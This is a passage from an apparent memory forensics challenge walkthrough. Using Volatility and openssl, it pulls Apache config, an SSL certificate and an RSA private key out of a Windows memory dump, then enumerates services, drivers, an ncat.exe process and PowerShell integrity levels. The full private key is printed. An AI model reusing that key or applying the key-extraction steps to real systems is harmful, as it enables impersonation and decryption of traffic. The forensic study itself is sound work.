\xampp\htdocs\dvwa\vulnerabilities\exec\index.php 216
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ mkdir httpd_dump
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat filescan.txt | grep httpd.conf 0xe78bf6e61b30 \xampp\apache\conf\httpd.conf 216
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir httpd_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf6e61b30
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf6e61b30 httpd.conf file.0xe78bf6e61b30.0xe78bf66e0450.DataSectionObject.httpd.conf.dat
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ grep --text --perl-regexp --ignore-case '^(ServerRoot|Listen|User|Group|ServerAdmin|ServerName|ErrorLog|LogLevel)' httpd_dump/file.0xe78bf6e61b30.0xe78bf66e0450.DataSectionObject.httpd.conf.dat ServerRoot "C:/xampp/apache" Listen 80 User daemon Group daemon ServerAdmin postmaster@localhost ServerName localhost:80 ErrorLog "logs/error.log" LogLevel warn
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat filescan.txt | grep --perl-regexp 'server\.key|server.crt' 0xe78bf79354a0 \xampp\apache\conf\ssl.crt\server.crt 216 0xe78bf7938510 \xampp\apache\conf\ssl.key\server.key 216
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ mkdir ssl_dump
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --output-dir ssl_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf79354a0 Volatility 3 Framework 2.5.2 Progress: 100.00 PDB scanning finished Cache FileObject FileName Result DataSectionObject 0xe78bf79354a0 server.crt file.0xe78bf79354a0.0xe78bf6c41970.DataSectionObject.server.crt.dat
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ file ssl_dump/file.0xe78bf79354a0.0xe78bf6c41970.DataSectionObject.server.crt.dat ssl_dump/file.0xe78bf79354a0.0xe78bf6c41970.DataSectionObject.server.crt.dat: PEM certificate
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat ssl_dump/file.0xe78bf79354a0.0xe78bf6c41970.DataSectionObject.server.crt.dat -----BEGIN CERTIFICATE----- MIIBnzCCAQgCCQC1x1LJh4G1AzANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDEwls b2NhbGhvc3QwHhcNMDkxMTEwMjM0ODQ3WhcNMTkxMTA4MjM0ODQ3WjAUMRIwEAYD VQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMEl0yfj 7K0Ng2pt51+adRAj4pCdoGOVjx1BmljVnGOMW3OGkHnMw9ajibh1vB6UfHxu463o J1wLxgxq+Q8y/rPEehAjBCspKNSq+bMvZhD4p8HNYMRrKFfjZzv3ns1IItw46kgT gDpAl1cMRzVGPXFimu5TnWMOZ3ooyaQ0/xntAgMBAAEwDQYJKoZIhvcNAQEFBQAD gYEAavHzSWz5umhfb/MnBMa5DL2VNzS+9whmmpsDGEG+uR0kM1W2GQIdVHHJTyFd aHXzgVJBQcWTwhp84nvHSiQTDBSaT6cQNQpvag/TaED/SEQpm0VqDFwpfFYuufBL vVNbLkKxbK2XwUvu0RxoLdBMC/89HqrZ0ppiONuQ+X2MtxE= -----END CERTIFICATE-----
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ openssl x509 -in ssl_dump/file.0xe78bf79354a0.0xe78bf6c41970.DataSectionObject.server.crt.dat -text -noout Certificate: Data: Version: 1 (0x0) Serial Number: b5:c7:52:c9:87:81:b5:03 Signature Algorithm: sha1WithRSAEncryption Issuer: CN = localhost Validity Not Before: Nov 10 23:48:47 2009 GMT Not After : Nov 8 23:48:47 2019 GMT Subject: CN = localhost Subject Public Key Info: Public Key Algorithm: rsaEncryption Public-Key: (1024 bit) Modulus: 00:c1:25:d3:27:e3:ec:ad:0d:83:6a:6d:e7:5f:9a: 75:10:23:e2:90:9d:a0:63:95:8f:1d:41:9a:58:d5: 9c:63:8c:5b:73:86:90:79:cc:c3:d6:a3:89:b8:75: bc:1e:94:7c:7c:6e:e3:ad:e8:27:5c:0b:c6:0c:6a: f9:0f:32:fe:b3:c4:7a:10:23:04:2b:29:28:d4:aa: f9:b3:2f:66:10:f8:a7:c1:cd:60:c4:6b:28:57:e3: 67:3b:f7:9e:cd:48:22:dc:38:ea:48:13:80:3a:40: 97:57:0c:47:35:46:3d:71:62:9a:ee:53:9d:63:0e: 67:7a:28:c9:a4:34:ff:19:ed Exponent: 65537 (0x10001) Signature Algorithm: sha1WithRSAEncryption Signature Value: 6a:f1:f3:49:6c:f9:ba:68:5f:6f:f3:27:04:c6:b9:0c:bd:95: 37:34:be:f7:08:66:9a:9b:03:18:41:be:b9:1d:24:33:55:b6: 19:02:1d:54:71:c9:4f:21:5d:68:75:f3:81:52:41:41:c5:93: c2:1a:7c:e2:7b:c7:4a:24:13:0c:14:9a:4f:a7:10:35:0a:6f: 6a:0f:d3:68:40:ff:48:44:29:9b:45:6a:0c:5c:29:7c:56:2e: b9:f0:4b:bd:53:5b:2e:42:b1:6c:ad:97:c1:4b:ee:d1:1c:68: 2d:d0:4c:0b:ff:3d:1e:aa:d9:d2:9a:62:38:db:90:f9:7d:8c: b7:11
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --output-dir ssl_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf7938510 Volatility 3 Framework 2.5.2 Progress: 100.00 PDB scanning finished Cache FileObject FileName Result DataSectionObject 0xe78bf7938510 server.key file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ file ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat: PEM RSA private key ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -----BEGIN RSA PRIVATE KEY----- MIICXQIBAAKBgQDBJdMn4+ytDYNqbedfmnUQI+KQnaBjlY8dQZpY1ZxjjFtzhpB5 zMPWo4m4dbwelHx8buOt6CdcC8YMavkPMv6zxHoQIwQrKSjUqvmzL2YQ+KfBzWDE ayhX42c7957NSCLcOOpIE4A6QJdXDEc1Rj1xYpruU51jDmd6KMmkNP8Z7QIDAQAB AoGBAJvUs58McihQrcVRdIoaqPXjrei1c/DEepnFEw03EpzyYdo8KBZM0Xg7q2KK gsM9U45lPQZTNmY6DYh5SgYsQ3dGvocvwndq+wK+QsWH8ngTYqYqwUBBCaX3kwgk nAc++EpRRVmV0dJMdXt3xAUKSXnDP9fLPdKXffJoG7C1HHVVAkEA+087rR2FLCjd Rq/9WhIT/p2U0RRQnMJyQ74chIJSbeyXg8Ell5QxhSg7skrHSZ0cBPhyaLNDIZkn 3NMnK2UqhwJBAMTAsUorHNo4dGpO8y2HE6QXxeuX05OhjiO8H2hmmcuMi2C9OwGI rI+lx1Q8mK261NKJh7sSVwQikh5YQYLKcOsCQQD6YqcChDb7GHvewdmatAhX1ok/ Bw6KIPHXrMKdA3s9KkyLaRUbQPtVwBA6Q2brYS1Zhm/3ASQRhZbB3V9ZTSJhAkB7 72097P5Vr24VcPnZWdbTbG4twwtxWTix5dRa7RY/k55QJ6K9ipw4OBLhSvJZrPBW Vm97NUg+wJAOMUXC30ZVAkA6pDgLbxVqkCnNgh2eNzhxQtvEGE4a8yFSUfSktS9U bjAATRYXNv2mAms32aAVKTzgSTapEX9M1OWdk+/yJrJs -----END RSA PRIVATE KEY-----
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ openssl rsa -in ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -noout -text | head --lines=10 Private-Key: (1024 bit, 2 primes) modulus: 00:c1:25:d3:27:e3:ec:ad:0d:83:6a:6d:e7:5f:9a: 75:10:23:e2:90:9d:a0:63:95:8f:1d:41:9a:58:d5: 9c:63:8c:5b:73:86:90:79:cc:c3:d6:a3:89:b8:75: bc:1e:94:7c:7c:6e:e3:ad:e8:27:5c:0b:c6:0c:6a: f9:0f:32:fe:b3:c4:7a:10:23:04:2b:29:28:d4:aa: f9:b3:2f:66:10:f8:a7:c1:cd:60:c4:6b:28:57:e3: 67:3b:f7:9e:cd:48:22:dc:38:ea:48:13:80:3a:40: 97:57:0c:47:35:46:3d:71:62:9a:ee:53:9d:63:0e: ...
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ openssl rsa -in ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -pubout > mem_server_pub.pem writing RSA key ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat mem_server_pub.pem -----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDBJdMn4+ytDYNqbedfmnUQI+KQ naBjlY8dQZpY1ZxjjFtzhpB5zMPWo4m4dbwelHx8buOt6CdcC8YMavkPMv6zxHoQ IwQrKSjUqvmzL2YQ+KfBzWDEayhX42c7957NSCLcOOpIE4A6QJdXDEc1Rj1xYpru U51jDmd6KMmkNP8Z7QIDAQAB -----END PUBLIC KEY-----
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ openssl rsa -in mem_server_pub.pem -pubin -text -noout Public-Key: (1024 bit) Modulus: 00:c1:25:d3:27:e3:ec:ad:0d:83:6a:6d:e7:5f:9a: 75:10:23:e2:90:9d:a0:63:95:8f:1d:41:9a:58:d5: 9c:63:8c:5b:73:86:90:79:cc:c3:d6:a3:89:b8:75: bc:1e:94:7c:7c:6e:e3:ad:e8:27:5c:0b:c6:0c:6a: f9:0f:32:fe:b3:c4:7a:10:23:04:2b:29:28:d4:aa: f9:b3:2f:66:10:f8:a7:c1:cd:60:c4:6b:28:57:e3: 67:3b:f7:9e:cd:48:22:dc:38:ea:48:13:80:3a:40: 97:57:0c:47:35:46:3d:71:62:9a:ee:53:9d:63:0e: 67:7a:28:c9:a4:34:ff:19:ed Exponent: 65537 (0x10001)
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ echo "Welcome to Nik's Total Recall 2024 Memory Forensics Challenge" > stolen_private_key.txt ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat stolen_private_key.txt Welcome to Nik's Total Recall 2024 Memory Forensics Challenge
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ openssl pkeyutl -encrypt -inkey mem_server_pub.pem -pubin -in stolen_private_key.txt -out stolen_private_key.txt.enc
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ xxd stolen_private_key.txt.enc 00000000: aafd f40c 5501 a1e7 c2d2 67c1 64a9 96bd ....U.....g.d... 00000010: 218f 4455 3927 4d48 bd06 5b60 8e68 f872 !.DU9'MH..[`.h.r 00000020: d3f7 1e59 a58f 59ca 02cc 2cdc c9a6 1fc0 ...Y..Y...,..... 00000030: 83cc a903 cbbe b2ca 12be 24f2 450a c788 ..........$.E... 00000040: 2f7b 0502 1780 c944 18a3 857e 599e a9a2 /{.....D...~Y... 00000050: 7dd3 5a1c 3806 ce2d 32d0 4662 d246 feeb }.Z.8..-2.Fb.F.. 00000060: 1b87 254d 753c c681 97cb 4f4c cecb 9a43 ..%Mu<....OL...C 00000070: 67d8 7513 2fcd 39eb ad1d 1b00 b5a5 db91 g.u./.9.........
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ xxd stolen_private_key.txt 00000000: 5765 6c63 6f6d 6520 746f 204e 696b 2773 Welcome to Nik's 00000010: 2054 6f74 616c 2052 6563 616c 6c20 3230 Total Recall 20 00000020: 3234 204d 656d 6f72 7920 466f 7265 6e73 24 Memory Forens 00000030: 6963 7320 4368 616c 6c65 6e67 650a ics Challenge.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ openssl pkeyutl -decrypt -inkey ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -in stolen_private_key.txt.enc > stolen_private_key.txt.dec
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat stolen_private_key.txt.dec Welcome to Nik's Total Recall 2024 Memory Forensics Challenge
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.dlllist.DllList --pid 10008 > httpd_dlllist.txt Progress: 100.00 PDB scanning finished
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ head httpd_dlllist.txt --lines=5 Volatility 3 Framework 2.5.2 PID Process Base Size Name Path LoadTime File output 10008 httpd.exe 0x7ff69ef60000 0xc000 httpd.exe c:\xampp\apache\bin\httpd.exe 2023-11-16 23:26:15.000000 Disabled
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat drivers_scan.txt | head --lines=10 Volatility 3 Framework 2.5.2 Offset Start Size Service Key Driver Name Name 0xb9841ee78464 0x690064004e 0x610057 N/A N/A N/A 0xb9841ee78464 0x690064004e 0x610057 N/A N/A N/A 0xb9841ee8f31c 0x939800249370 0x249420 N/A N/A N/A 0xb9841ee8f31c 0x939800249370 0x249420 N/A N/A N/A 0xe78befeb8c20 0xf8021f400000 0x0 \Driver\ACPI_HAL ACPI_HAL \Driver\ACPI_HAL 0xe78befeb8e30 0xf8021f400000 0x0 \Driver\WMIxWDM WMIxWDM \Driver\WMIxWDM .......
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat drivers_scan.txt | awk --field-separator=' ' '{ print $6 }'| sort --unique | sed '1,2d' | head --lines=-3 | wc --lines 155
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.getservicesids.GetServiceSIDs > service_sids.txt Progress: 100.00 PDB scanning finished
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat service_sids.txt | grep --perl-regexp --ignore-case 'DumpIt|npcap|ssh' S-1-5-80-799667949-3218159461-2708755627-866028366-136143606 DumpIt S-1-5-80-1676788727-3510623216-988961428-862518577-4183329668 npcap S-1-5-80-3864102162-464399774-2857244265-230461771-3046054788 npcap_wifi S-1-5-80-2277354432-2697620045-1656008878-1855416240-261295475 ssh-agent S-1-5-80-3847866527-469524349-687026318-516638107-1125189541 sshd
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.modscan.ModScan > modscan.txt Progress: 100.00 PDB scanning finished
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ grep --perl-regexp --ignore-case 'DumpIt|npcap|ssh' modscan.txt 0xe78bf0831710 0xf802266b0000 0x13000 npcap.sys \SystemRoot\system32\DRIVERS\npcap.sys Disabled 0xe78bf49f58e0 0xf802469f0000 0x14000 DumpIt.sys \??\C:\Windows\system32\Drivers\DumpIt.sys Disabled
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ grep --perl-regexp --ignore-case 'DumpIt|npcap|ssh' modules.txt 0xe78bf0831710 0xf802266b0000 0x13000 npcap.sys \SystemRoot\system32\DRIVERS\npcap.sys Disabled 0xe78bf49f58e0 0xf802469f0000 0x14000 DumpIt.sys \??\C:\Windows\system32\Drivers\DumpIt.sys Disabled
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.ldrmodules.LdrModules --pid 5652 Volatility 3 Framework 2.5.2 Progress: 100.00 PDB scanning finished Pid Process Base InLoad InInit InMem MappedPath ... 5652 DumpIt.exe 0x7ff7da2c0000 True False True \TOOLS\DumpIt.exe
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.ldrmodules.LdrModules --pid 5652 > 5652_dumpit.txt Progress: 100.00 PDB scanning finished ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat 5652_dumpit.txt | sed '1,4d' | wc --lines 39
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.svcscan > svcscan.txt Progress: 100.00 PDB scanning finished
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$cat svcscan.txt | sed '1,4d' | wc --lines 825
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$cat svcscan.txt | awk --field-separator=' ' '{ print $5 }' | sort | uniq --count | sort | tail --lines=2 361 SERVICE_RUNNING 464 SERVICE_STOPPED
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat svcscan.txt | awk --field-separator=' ' '{ print $4 }' | sort | uniq --count | sort --numeric-sort --reverse 566 SERVICE_DEMAND_START 165 SERVICE_AUTO_START 47 SERVICE_BOOT_START 32 SERVICE_SYSTEM_START 15 SERVICE_DISABLED
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat svcscan.txt | awk --field-separator=' ' '{ print $6 }' | sort | uniq --count | sort --numeric-sort --reverse 352 SERVICE_KERNEL_DRIVER 180 SERVICE_WIN32_SHARE_PROCESS 150 SERVICE_WIN32_OWN_PROCESS|SERVICE_WIN32_SHARE_PROCESS 100 SERVICE_WIN32_OWN_PROCESS 40 SERVICE_FILE_SYSTEM_DRIVER 3 2 SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS 1 Type 1 SERVICE_WIN32_SHARE_PROCESS|SERVICE_INTERACTIVE_PROCESS
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat svcscan.txt | grep npcap 0x2152b86a460 328 N/A SERVICE_SYSTEM_START SERVICE_RUNNING SERVICE_KERNEL_DRIVER npcap Npcap Packet Driver (NPCAP)
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ grep --ignore-case 'sshd' svcscan.txt 0x2152b887240 462 0 SERVICE_AUTO_START SERVICE_RUNNING SERVICE_WIN32_OWN_PROCESS sshd OpenSSH SSH Server - 0x2152b8888f0 462 0 SERVICE_AUTO_START SERVICE_RUNNING SERVICE_WIN32_OWN_PROCESS sshd OpenSSH SSH Server
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.getsids --pid 896 Volatility 3 Framework 2.5.2 Progress: 100.00 PDB scanning finished PID Process SID Name 896 ncat.exe S-1-5-21-1563833629-3224366856-3602044515-1001 securitynik 896 ncat.exe S-1-5-21-1563833629-3224366856-3602044515-513 Domain Users 896 ncat.exe S-1-1-0 Everyone 896 ncat.exe S-1-5-114 Local Account (Member of Administrators) 896 ncat.exe S-1-5-32-544 Administrators 896 ncat.exe S-1-5-32-545 Users 896 ncat.exe S-1-5-4 Interactive 896 ncat.exe S-1-2-1 Console Logon (Users who are logged onto the physical console) 896 ncat.exe S-1-5-11 Authenticated Users 896 ncat.exe S-1-5-15 This Organization 896 ncat.exe S-1-5-113 Local Account 896 ncat.exe S-1-5-5-0-1032752 Logon Session 896 ncat.exe S-1-2-0 Local (Users with the ability to log in locally) 896 ncat.exe S-1-5-64-10 NTLM Authentication 896 ncat.exe S-1-16-8192 Medium Mandatory Level
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat pslist.txt | grep powershell 2992 1548 powershell.exe 0xe78bf3d6e0c0 0 - 0 False 2023-11-16 19:18:05.000000 2023-11-16 19:18:06.000000 Disabled 2252 2992 powershell.exe 0xe78bf435f0c0 0 - 0 False 2023-11-16 19:18:06.000000 2023-11-16 22:01:47.000000 Disabled 4728 2460 powershell.exe 0xe78bf4f900c0 10 - 1 False 2023-11-16 20:05:01.000000 N/A Disabled 644 2460 powershell.exe 0xe78bf5287080 9 - 1 False 2023-11-16 21:16:12.000000 N/A Disabled 4852 2460 powershell.exe 0xe78bf46770c0 9 - 1 False 2023-11-16 21:42:18.000000 N/A Disabled 4120 5508 powershell.exe 0xe78bf6961080 0 - 0 False 2023-11-16 22:08:06.000000 2023-11-16 22:08:31.000000 Disabled
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.getsids --pid 2992 2252 4728 644 4852 4120 | grep --ignore-case Mandatory 2992 powershell.exe S-1-16-16384 System Mandatory Level 2252 powershell.exe S-1-16-16384 System Mandatory Level 4728 powershell.exe S-1-16-12288 High Mandatory Level 644 powershell.exe S-1-16-12288 High Mandatory Level 4852 powershell.exe S-1-16-12288 High Mandatory Level 4120 powershell.exe S-1-16-16384 System Mandatory Level
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ echo 'PHRASE THAT PAYS:**public_key_decrypted**' | openssl pkeyutl -inkey ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -sign -out encrypted_w_priv_key.enc
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ hexdump --canonical encrypted_w_priv_key.enc 00000000 60 8a d3 84 6f 04 b3 4e 50 58 8a cd 59 88 1b e1 |`...o..NPX..Y...| 00000010 78 fb 5c 85 25 9a c9 4e da ad 64 ee 51 a1 3d 4b |x.\.%..N..d.Q.=K| 00000020 61 aa 44 4f a8 f9 92 9c 7d b6 5d 7b db c4 c1 83 |a.DO....}.]{....| 00000030 69 e5 6d 4a 79 b3 12 e8 fe fb bf 09 2a 5e 6f f6 |i.mJy.......*^o.| 00000040 37 52 01 84 df c6 01 31 ec d0 61 d0 a2 6f e7 46 |7R.....1..a..o.F| 00000050 ad 7a e6 b8 8d 89 31 1c fa 0c 65 35 65 74 21 d2 |.z....1...e5et!.| 00000060 77 d0 96 87 da e5 1b 3a 1f cf ae 40 27 cd 3f 31 |w......:...@'.?1| 00000070 f1 c2 3a 64 a7 9f 9a 98 59 f8 43 cf 09 75 19 88 |..:d....Y.C..u..| 00000080
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ openssl rsautl -inkey mem_server_pub.pem -pubin -in encrypted_w_priv_key.enc -hexdump -verify The command rsautl was deprecated in version 3.0. Use 'pkeyutl' instead. 0000 - 50 48 52 41 53 45 20 54-48 41 54 20 50 41 59 53 PHRASE THAT PAYS 0010 - 3a 2a 2a 70 75 62 6c 69-63 5f 6b 65 79 5f 64 65 :**public_key_de 0020 - 63 72 79 70 74 65 64 2a-2a 0a crypted**.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ openssl rsautl -inkey mem_server_pub.pem -pubin -in encrypted_w_priv_key.enc -verify --out decrypted.txt The command rsautl was deprecated in version 3.0. Use 'pkeyutl' instead. ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat decrypted.txt PHRASE THAT PAYS:**public_key_decrypted**
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ echo -e 'PHRASE THAT PAYS:**private_key_decrypted**' | openssl pkeyutl -encrypt -inkey mem_server_pub.pem -pubin -out encrypted_w_pub_key.enc
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ hexdump --canonical encrypted_w_pub_key.enc 00000000 4f 3a 60 1b 9d 67 78 44 51 34 8e dd 8e a7 c6 04 |O:`..gxDQ4......| 00000010 13 5f e1 77 1f c1 b5 a4 30 f9 47 82 ad 0b 54 27 |._.w....0.G...T'| 00000020 dc 4b 74 7d 08 ea 6b 5b db 73 ad a6 a7 08 ea 14 |.Kt}..k[.s......| 00000030 72 d7 2e a0 7e 43 1a 6d 94 5a 03 83 ea 1c 01 9c |r...~C.m.Z......| 00000040 1d 67 84 7b 89 86 db 6b ea 78 c4 41 1d a1 ce 7c |.g.{...k.x.A...|| 00000050 2f 91 15 ff b0 08 6c c8 bd 9b fe 88 c8 a9 f8 e6 |/.....l.........| 00000060 b3 ca 38 63 71 f8 61 7f 78 52 8a 96 be c6 f8 ac |..8cq.a.xR......| 00000070 a6 5b 8f 22 b9 59 3d cc 02 bf c8 ed f2 b9 aa ea |.[.".Y=.........| 00000080
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ openssl pkeyutl -decrypt -inkey ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -in encrypted_w_pub_key.enc | hexdump --canonical 00000000 50 48 52 41 53 45 20 54 48 41 54 20 50 41 59 53 |PHRASE THAT PAYS| 00000010 3a 2a 2a 70 72 69 76 61 74 65 5f 64 65 79 5f 64 |:**private_key_d| 00000020 65 63 72 79 70 74 65 64 2a 2a 0a |ecrypted**.| 0000002b